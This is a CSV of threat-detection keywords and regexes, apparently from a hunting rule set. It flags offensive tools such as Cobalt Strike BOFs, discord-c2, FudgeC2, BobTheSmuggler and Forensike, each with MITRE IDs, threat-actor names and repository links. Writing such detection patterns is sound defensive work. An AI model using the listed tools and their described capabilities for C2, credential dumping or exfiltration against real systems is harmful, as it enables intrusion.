"*bm90cmVkYW1lY2hlYXRzdG93aW4-*",".{0,1000}bm90cmVkYW1lY2hlYXRzdG93aW4\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","36099"
"*bmarchev/Forensike*",".{0,1000}bmarchev\/Forensike.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","36100"
"*bmdyy/discord-c2*",".{0,1000}bmdyy\/discord\-c2.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","1","N/A","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","36101"
"*bob@moozle.wtf*",".{0,1000}bob\@moozle\.wtf.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","#email","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","36104"
"*BobTheSmuggler.py*",".{0,1000}BobTheSmuggler\.py.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","36105"
"*BobTheSmuggler-main*",".{0,1000}BobTheSmuggler\-main.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","36106"
"*BOF prototype works!*",".{0,1000}BOF\sprototype\sworks!.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","0","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","36107"
"*bof*/CredEnum/*",".{0,1000}bof.{0,1000}\/CredEnum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","36108"
"*BOF.NET.git*",".{0,1000}BOF\.NET\.git.{0,1000}","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36109"
"*BOF.NET-main*",".{0,1000}BOF\.NET\-main.{0,1000}","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36110"
"*BOF/*procdump/*",".{0,1000}BOF\/.{0,1000}procdump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","36111"
"*bof_allocator*",".{0,1000}bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36112"
"*bof_helper.py*",".{0,1000}bof_helper\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","N/A","10","10","228","43","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z","36113"
"*bof_net_user.c*",".{0,1000}bof_net_user\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","36114"
"*bof_net_user.o*",".{0,1000}bof_net_user\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","36115"
"*bof_pack.py *",".{0,1000}bof_pack\.py\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","36116"
"*bof_reuse_memory*",".{0,1000}bof_reuse_memory.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36117"
"*BOF2shellcode*",".{0,1000}BOF2shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","N/A","10","10","193","28","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z","36118"
"*bof2shellcode.py*",".{0,1000}bof2shellcode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","N/A","10","10","193","28","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z","36119"
"*BOF-DLL-Inject*",".{0,1000}BOF\-DLL\-Inject.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","36120"
"*bofentry::bof_entry*",".{0,1000}bofentry\:\:bof_entry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","36121"
